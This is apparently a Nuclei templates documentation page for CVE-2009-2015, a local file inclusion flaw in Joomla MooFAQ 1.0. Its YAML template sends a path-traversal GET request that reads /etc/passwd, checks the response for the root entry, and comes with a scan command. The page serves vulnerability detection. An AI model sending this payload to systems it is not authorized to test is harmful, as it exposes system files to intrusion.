Skip to content
Nuclei Templates

Joomla! MooFAQ 1.0 - Local File Inclusion

ID: CVE-2009-2015

Severity: high

Author: daffainfo

Tags: cve,cve2009,joomla,lfi,edb

Description

Section titled “Description”

Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).

YAML Source

Section titled “YAML Source”
id: CVE-2009-2015


info:
  name: Joomla! MooFAQ 1.0 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
  impact: |
    The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, information disclosure.
  remediation: |
    Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor.
  reference:
    - https://www.exploit-db.com/exploits/8898
    - http://www.vupen.com/english/advisories/2009/1530
    - https://nvd.nist.gov/vuln/detail/CVE-2009-2015
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2009-2015
    cwe-id: CWE-22
    epss-score: 0.01197
    epss-percentile: 0.84862
    cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joomla
    product: joomla
  tags: cve,cve2009,joomla,lfi,edb


http:
  - method: GET
    path:
      - "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a858ba9540f20d9baad8f49df2216121a1544dfd172720c49344dc96c7f18618022100d786f657c847ec5132ceb8a892e768ea7f49d1e5a8a88e5324c85847d56d19c8:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2009/CVE-2009-2015.yaml"

View on Github